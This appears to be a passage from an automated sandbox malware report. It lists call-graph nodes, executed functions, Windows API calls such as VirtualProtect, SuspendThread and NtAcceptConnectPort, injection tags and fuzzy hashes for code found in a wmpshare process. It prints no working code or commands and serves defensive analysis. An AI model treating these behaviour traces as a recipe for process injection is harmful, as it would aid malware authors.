34478->34480 34479->34480 34482 286f60829cb 34480->34482 34483 286f60829c1 34480->34483 34481 286f6082a0d VirtualProtect 34481->34483 34482->34481 34484 286f60869b8 34485 286f60869d4 34484->34485 34486 286f60869e2 34485->34486 34487 286f60869d9 GetProcAddressForCaller 34485->34487 34487->34486 34488 286f608515c 34501 286f6092a20 34488->34501 34490 286f6085374 34491 286f60851b5 34491->34490 34492 286f6085367 34491->34492 34504 286f6092dac 34491->34504 34513 286f609290c 34492->34513 34499 286f6092dac NtAcceptConnectPort 34500 286f60852f2 34499->34500 34510 286f6092ddc 34500->34510 34502 286f6092a30 NtAcceptConnectPort 34501->34502 34503 286f6092a45 34501->34503 34502->34503 34503->34491 34505 286f6085244 34504->34505 34506 286f6092dbc NtAcceptConnectPort 34504->34506 34505->34492 34507 286f6092cac 34505->34507 34506->34505 34508 286f6085290 34507->34508 34509 286f6092cbf NtAcceptConnectPort 34507->34509 34508->34499 34508->34500 34509->34508 34511 286f6092df0 34510->34511 34512 286f6092dec NtAcceptConnectPort 34510->34512 34511->34492 34512->34511 34514 286f6092920 34513->34514 34515 286f609291c NtAcceptConnectPort 34513->34515 34514->34490 34515->34514 34516 286f608cc9c 34517 286f608ccba 34516->34517 34530 286f608cd34 34516->34530 34518 286f608ce5f 34517->34518 34519 286f608cce0 34517->34519 34517->34530 34521 286f608a7e0 malloc 34518->34521 34520 286f608ce2e 34519->34520 34524 286f608ccf7 34519->34524 34522 286f608a7e0 malloc 34520->34522 34523 286f608ce42 34521->34523 34522->34523 34525 286f608ce93 ReadFile 34523->34525 34526 286f608cd2b 34524->34526 34527 286f608cded 34524->34527 34524->34530 34525->34530 34526->34530 34531 286f608c994 34526->34531 34544 286f608bc64 34527->34544 34532 286f608cc66 34531->34532 34543 286f608c9ce 34531->34543 34532->34530 34533 286f608cc4f 34534 286f608a9d4 free 34533->34534 34534->34532 34535 286f608cbca free 34536 286f608cbd5 34535->34536 34536->34533 34558 286f608c2d0 34536->34558 34538 286f608cbc2 34562 286f609e398 free free 34538->34562 34541 286f608aa34 malloc 34541->34543 34543->34532 34543->34535 34543->34536 34543->34538 34543->34541 34551 286f609e7e8 free free 34543->34551 34552 286f609dbcc 34543->34552 34545 286f608bd60 34544->34545 34546 286f608bc92 34544->34546 34545->34530 34546->34545 34547 286f608bcb5 OpenFileMappingW 34546->34547 34547->34545 34548 286f608bcd2 MapViewOfFile 34547->34548 34549 286f608bd57 CloseHandle 34548->34549 34550 286f608bcf0 34548->34550 34549->34545 34550->34549 34551->34543 34553 286f609dbe5 34552->34553 34556 286f609dbde 34552->34556 34554 286f609dc1e free 34553->34554 34555 286f609dc24 34553->34555 34553->34556 34554->34555 34555->34556 34563 286f60c4c3c 34555->34563 34556->34543 34559 286f608c313 34558->34559 34561 286f608c87a 34558->34561 34560 286f608c7c0 VirtualAlloc 34559->34560 34559->34561 34560->34561 34561->34533 34562->34535 34564 286f60c4c83 34563->34564 34565 286f60c4c4a 34563->34565 34564->34556 34565->34564 34566 286f60c4c6c free 34565->34566 34566->34564

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00007DF4655F1958 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337nativememoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000003.2722216949.00007DF4655F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4655F1000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_3_7df4655f1000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MemoryVirtual$Read$Protect$Write$AllocateInformationProcessQuerycalloc
                                                                                                                                                                                          • String ID: H$H
                                                                                                                                                                                          • API String ID: 874015164-136785262
                                                                                                                                                                                          • Opcode ID: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                                                                                          • Instruction ID: b881bc302268904d89359b7a7bd1f2d427b4afa94feec480eedc565b59269d03
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                                                                                          • Instruction Fuzzy Hash: BFB164B160CB888FE754EF18D885A9AB7E5FBD4304F400A2EE58FC3255DB34E5458B86
                                                                                                                                                                                          Function 00000286F6093218 Relevance: 17.0, APIs: 2, Strings: 7, Instructions: 1263COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 286f6093218-286f6093274 call 286f60849e4 3 286f60942bb-286f60942e1 call 286f60949f0 0->3 4 286f609327a-286f60932db call 286f6086dfc * 3 call 286f60832fc call 286f6086dfc 0->4 18 286f60932e1-286f6093bf4 4->18 19 286f60942a8-286f60942a9 4->19 21 286f6093d49-286f6093d51 18->21 22 286f6093bfa-286f6093c05 18->22 20 286f60942ad-286f60942b6 call 286f6084a40 19->20 20->3 24 286f6093d53-286f6093d58 21->24 25 286f6093dc4-286f6093dd5 21->25 22->21 26 286f6093c0b-286f6093c19 22->26 24->25 30 286f6093d5a-286f6093d64 RtlFormatCurrentUserKeyPath 24->30 28 286f6093e2e-286f6093e34 25->28 29 286f6093dd7-286f6093def 25->29 31 286f6093c1f-286f6093c27 26->31 32 286f6093d44-286f6093d45 26->32 34 286f6093e5f-286f6093e72 28->34 35 286f6093e36-286f6093e37 28->35 29->28 48 286f6093df1-286f6093df9 29->48 30->25 33 286f6093d66-286f6093d77 30->33 31->32 36 286f6093c2d-286f6093c45 31->36 32->21 41 286f6093d92-286f6093d9a 33->41 42 286f6093d79-286f6093d85 33->42 34->19 51 286f6093e78-286f6093e83 34->51 37 286f6093e39-286f6093e58 35->37 38 286f6093d38-286f6093d3c 36->38 39 286f6093c4b-286f6093c4c 36->39 37->37 43 286f6093e5a-286f6093e5b 37->43 47 286f6093d3e-286f6093d3f 38->47 44 286f6093c4f-286f6093c5f 39->44 45 286f6093d9c-286f6093db8 call 286f6081000 41->45 60 286f6093d87-286f6093d90 42->60 61 286f6093dbb-286f6093dbc 42->61 43->34 49 286f6093c71-286f6093c73 44->49 45->61 47->32 52 286f6093e0b 48->52 53 286f6093dfb-286f6093e09 48->53 56 286f6093c61-286f6093c6f 49->56 57 286f6093c75-286f6093c7a 49->57 51->19 58 286f6093e89-286f6093e97 51->58 52->28 59 286f6093e0d-286f6093e28 52->59 53->28 56->49 62 286f6093c80 57->62 63 286f6093d05-286f6093d08 57->63 58->19 64 286f6093e9d-286f6093ea5 58->64 59->28 60->45 61->25 67 286f6093c82-286f6093c89 62->67 65 286f6093d15-286f6093d24 63->65 66 286f6093d0a-286f6093d0e 63->66 64->19 68 286f6093eab-286f6093ecb calloc 64->68 65->44 70 286f6093d2a-286f6093d36 65->70 66->65 69 286f6093d10-286f6093d11 66->69 71 286f6093ca3-286f6093ccf 67->71 72 286f6093c8b-286f6093c9f 67->72 68->19 73 286f6093ed1-286f6093ef5 68->73 69->65 70->47 75 286f6093cd1-286f6093ce5 call 286f6094a1c 71->75 76 286f6093cf7-286f6093cf8 71->76 72->67 74 286f6093ca1 72->74 77 286f6094014-286f609404f 73->77 78 286f6093efb-286f6093f0e 73->78 74->63 75->76 88 286f6093ce7-286f6093cf5 75->88 81 286f6093cfd-286f6093cfe 76->81 86 286f6094051-286f6094052 77->86 87 286f60940a7-286f60940b7 77->87 80 286f6093f10-286f6093f1a 78->80 84 286f6093f20-286f6093f24 80->84 85 286f6093fe5-286f6093ff7 80->85 81->63 84->85 89 286f6093f2a-286f6093f74 call 286f6094a30 84->89 85->80 90 286f6093ffd-286f6094012 85->90 91 286f6094054-286f609405c 86->91 87->19 100 286f60940bd-286f60940d3 87->100 88->81 97 286f6093f88-286f6093f8a 89->97 90->77 93 286f609405e-286f6094063 91->93 94 286f6094089-286f609409d 91->94 93->94 98 286f6094065-286f609406e 93->98 94->91 99 286f609409f-286f60940a0 94->99 101 286f6093f76-286f6093f86 97->101 102 286f6093f8c-286f6093fa2 97->102 103 286f6094071-286f6094074 98->103 99->87 104 286f60940d5-286f60940d6 100->104 105 286f6094149-286f609414f 100->105 101->97 106 286f6093fe1 102->106 107 286f6093fa4-286f6093fac 102->107 108 286f6094076 103->108 109 286f609407d-286f6094087 103->109 112 286f60940d8-286f60940e3 104->112 110 286f6094151-286f6094155 105->110 111 286f60941a2-286f60941a9 105->111 106->85 107->106 117 286f6093fae 107->117 108->109 109->94 109->103 118 286f609415c-286f6094167 110->118 115 286f60941af-286f60941cf call 286f60832fc 111->115 116 286f6094256-286f6094258 111->116 113 286f60940e5-286f60940f2 112->113 114 286f60940f4-286f6094108 112->114 113->114 133 286f609410c-286f609411b 113->133 114->105 119 286f609410a 114->119 134 286f60941d1-286f60941e2 call 286f60835b8 115->134 135 286f60941e4-286f60941f8 call 286f60832fc 115->135 122 286f6094284-286f609428d 116->122 123 286f609425a-286f6094264 116->123 121 286f6093fb0-286f6093fc9 call 286f6094a1c 117->121 124 286f6094189-286f60941a0 118->124 125 286f6094169-286f6094175 118->125 119->112 141 286f6093fd5-286f6093fdb 121->141 142 286f6093fcb-286f6093fd1 121->142 122->20 130 286f609428f-286f60942a6 call 286f6086e0c call 286f608563c 122->130 123->122 129 286f6094266-286f6094280 123->129 124->111 124->118 125->124 131 286f6094177-286f609417e 125->131 129->122 130->20 131->124 132 286f6094180-286f6094187 131->132 132->124 138 286f609411d-286f609413a 133->138 139 286f609413c 133->139 134->135 151 286f609420d-286f6094223 call 286f6092804 134->151 135->116 152 286f60941fa-286f609420b call 286f60835b8 135->152 147 286f6094141-286f6094143 138->147 139->147 141->106 142->121 146 286f6093fd3 142->146 146->106 147->105 147->122 151->116 158 286f6094225-286f6094235 151->158 152->116 152->151 158->116 160 286f6094237-286f6094250 158->160 160->116
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentFormatPathUsercalloc
                                                                                                                                                                                          • String ID: ;$dW$;$dW$MZ$MZ$N$t$;Ln
                                                                                                                                                                                          • API String ID: 4207655178-84560671
                                                                                                                                                                                          • Opcode ID: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                                                                                          • Instruction ID: 0ec75f3db9824526d1d15cbb251f067504d5883d66501694f602389f15b8f6c6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                                                                                          • Instruction Fuzzy Hash: E4A2AEB4518B888FD375DF18D8887AAB7E5FBA9701F504A2ED58EC3352DB709540CB82
                                                                                                                                                                                          Function 00007DF4655F1CE8 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 296processnativethreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000003.2722216949.00007DF4655F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4655F1000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_3_7df4655f1000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Close$CreateFunctionHandleInformationOpenProcessProtectQueryResumeTableThreadValueVirtualVolumecallocfree
                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                          • API String ID: 167522227-2547889144
                                                                                                                                                                                          • Opcode ID: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                                                                                          • Instruction ID: cf8207ad8df6b2601c096a81cf2c42407ca2e6958eff9464fcd3e976d63d6e49
                                                                                                                                                                                          • Opcode Fuzzy Hash: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                                                                                          • Instruction Fuzzy Hash: D691A3B460CA894FFB54EB64D8986EB73E1FF94341F40452AD54BC3199DF78E8018B86
                                                                                                                                                                                          Function 00000286F608D004 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2502124517-0
                                                                                                                                                                                          • Opcode ID: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                                                                                          • Instruction ID: 8daef574a668ffd18af272d2e4267c1ef01c62f5cb778f0903d8febd86410143
                                                                                                                                                                                          • Opcode Fuzzy Hash: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A317E30208A088FEB95EF28E89879A77E5FF94310F604729D45BC21E5DF34C949CB81
                                                                                                                                                                                          Function 00000286F6093158 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 280 286f6093158-286f6093171 281 286f6093173-286f6093176 280->281 282 286f609317b-286f609317e 280->282 283 286f609320e-286f6093216 281->283 284 286f6093180-286f6093185 282->284 285 286f609318a-286f609319f 282->285 284->283 286 286f60931a1-286f60931a5 285->286 287 286f60931ab-286f60931da 285->287 286->287 288 286f60931ea 287->288 289 286f60931dc-286f60931e8 NtAcceptConnectPort 287->289 290 286f60931ef-286f60931f1 288->290 289->290 291 286f60931f3-286f60931fd 290->291 292 286f609320c 290->292 293 286f60931ff-286f6093203 291->293 294 286f6093205 291->294 292->283 295 286f609320a 293->295 294->295 295->292
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                          • API String ID: 0-4108050209
                                                                                                                                                                                          • Opcode ID: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                                                                                          • Instruction ID: ab3afb0ac3475c865124f3afa8753a6339d39b50015532331268414f9956452f
                                                                                                                                                                                          • Opcode Fuzzy Hash: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                                                                                          • Instruction Fuzzy Hash: 432157347059484FE758DE98A9CC32936E2EBA9305F60443EEA0AC3364DA35CD488B42
                                                                                                                                                                                          Function 00000286F608262C Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 297 286f608262c-286f6082666 call 286f60c342c 300 286f6082738-286f608273b 297->300 301 286f608266c-286f6082680 call 286f60c3426 Thread32First 297->301 302 286f608288e-286f60828a1 300->302 303 286f6082741-286f6082749 300->303 308 286f6082685-286f608268a 301->308 303->302 305 286f608274f-286f6082750 303->305 307 286f6082752-286f608276b 305->307 315 286f608287e-286f6082888 307->315 316 286f6082771-286f6082788 SuspendThread 307->316 309 286f6082690-286f608269a 308->309 310 286f6082716-286f6082722 call 286f60c3420 308->310 309->310 317 286f608269c-286f60826a6 309->317 314 286f6082727-286f6082729 310->314 314->308 318 286f608272f-286f6082732 CloseHandle 314->318 315->302 315->307 319 286f6082796-286f6082798 316->319 317->310 323 286f60826a8-286f60826ae 317->323 318->300 321 286f608279e-286f60827a2 319->321 322 286f6082873-286f608287c 319->322 324 286f60827b0-286f60827b1 321->324 325 286f60827a4-286f60827ae 321->325 322->315 328 286f60826b0-286f60826d2 323->328 329 286f60826d6-286f60826dc 323->329 326 286f60827b4-286f60827b6 324->326 325->326 326->322 330 286f60827bc-286f60827d2 326->330 328->318 337 286f60826d4 328->337 331 286f60826de-286f60826f8 329->331 332 286f6082705-286f6082712 329->332 333 286f60827d4-286f60827e5 330->333 331->318 342 286f60826fa-286f6082702 331->342 332->310 335 286f60827fe 333->335 336 286f60827e7-286f60827ea 333->336 341 286f6082800-286f608280a 335->341 339 286f60827f7-286f60827fc 336->339 340 286f60827ec-286f60827f5 336->340 337->332 339->341 340->341 343 286f6082862-286f608286a 341->343 344 286f608280c-286f608280e 341->344 342->332 343->333 345 286f6082870-286f6082871 343->345 346 286f6082814-286f6082821 344->346 347 286f60828ad-286f60828b1 344->347 345->322 348 286f6082823-286f608282e 346->348 349 286f608283d 346->349 350 286f60828bf-286f60828cc 347->350 351 286f60828b3-286f60828bd 347->351 352 286f6082830-286f608283b 348->352 353 286f60828a2-286f60828ab 348->353 354 286f608283f-286f6082842 349->354 355 286f60828ce-286f60828da 350->355 356 286f60828e9-286f60828ed 350->356 351->350 351->354 352->348 352->349 353->354 354->343 360 286f6082844-286f608285b 354->360 358 286f60828fb-286f6082903 355->358 359 286f60828dc-286f60828e7 355->359 356->349 357 286f60828f3-286f60828f6 356->357 357->354 358->354 359->355 359->356 360->343
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandleSuspendThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1038686644-0
                                                                                                                                                                                          • Opcode ID: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                                                                                          • Instruction ID: 995f9b55ae6451a0b9ad5a1e01ba01fb6166995f771665cb495528e6f8a43af9
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                                                                                          • Instruction Fuzzy Hash: E791133420EA068BEB68DB28EA5D27973D1FF65310F24815DD14BC7AA6CE74D842CBC1
                                                                                                                                                                                          Function 00007DF465602E90 Relevance: 3.0, APIs: 2, Instructions: 40nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2953646461.00007DF465601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465601000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465601000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InformationQuerySystem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3562636166-0
                                                                                                                                                                                          • Opcode ID: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                                                                                          • Instruction ID: ae630a742426b534ff78439612ba223bcce0f51290e5cfa608f2e40912612f13
                                                                                                                                                                                          • Opcode Fuzzy Hash: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                                                                                          • Instruction Fuzzy Hash: C5013C347199458FE798EB24EC58AA677F1FFE4301F544069E44BC22A0DF38D505CB42
                                                                                                                                                                                          Function 00007DF4656325D4 Relevance: 3.0, APIs: 2, Instructions: 40nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2954154781.00007DF465631000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465631000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465631000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InformationQuerySystem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3562636166-0
                                                                                                                                                                                          • Opcode ID: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                                                                                          • Instruction ID: 837bdcb0a3b0705502afb5ef8d8626c0dd9d16c93c3567e98e18e2c7ab113b97
                                                                                                                                                                                          • Opcode Fuzzy Hash: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                                                                                          • Instruction Fuzzy Hash: E80131346189458FF785EB25DC68B6677E1FFA4301F445429A44BC22A0DF78D585CB41
                                                                                                                                                                                          Function 00007DF4656522CC Relevance: 2.0, APIs: 1, Instructions: 450timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2954481861.00007DF465651000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465651000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465651000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FunctionProtectTableTimerVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2248422592-0
                                                                                                                                                                                          • Opcode ID: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                                                                                          • Instruction ID: db16c3598fc52d56bcc4bf7f1c300056019e58ebdf74eaaa5a2717075c3986fe
                                                                                                                                                                                          • Opcode Fuzzy Hash: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CE15271648A494FEB58EF28D8995EA77E1FFA8300F14462ED44FC3291DB34E945C781
                                                                                                                                                                                          Function 00000286F608C2D0 Relevance: 1.9, APIs: 1, Instructions: 699memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                          • Opcode ID: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                                                                                          • Instruction ID: cee87daf3e925cc40801354a7751300d257069eacbd20a17c8113d283603b4b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F22573061CA540EE72DDB28A88E6BA77E0FBA5301F24866ED1DBC2593DE34D547C781
                                                                                                                                                                                          Function 00000286F6092EC8 Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                                                                                          • Instruction ID: 44058be03cbc6471716e2222472f8f7f9361b480d4786666f3495f8407fa2ac2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                                                                                          • Instruction Fuzzy Hash: B281DA34219B4A8BF769DB14E65C76AB3D2FFA4308F60C529E547C379ADF64D8008B81
                                                                                                                                                                                          Function 00000286F6092CAC Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                                                                                          • Instruction ID: 6591a515fb8fa04d427fbd5eba54ada6c19bac872886940b57bd7100ce571849
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AF0B774A28B858FEB64EB2CD589B9977E1FBA9304F508519E84CC3345EA34D8448B86
                                                                                                                                                                                          Function 00000286F6092E84 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                                                                                          • Instruction ID: 185859a20adba91b2b667cfdfb317350ab1264b1e8cce782af9feb3940e897ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                                                                                          • Instruction Fuzzy Hash: 72E02B352146048FDB00DF94D9C4869B3E0EBE5304F004D29E84BCA164D270D548C782
                                                                                                                                                                                          Function 00000286F6092D80 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                                                                                          • Instruction ID: e2d2e30eb1f096c87c7a086e64f1ce891f0d2b3954b5c86dbedab8f9daf7229a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 73D0A538535B494FE650F71C970470537D1FFD5308F5146149449C3304E52DD4444387
                                                                                                                                                                                          Function 00000286F6092DAC Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
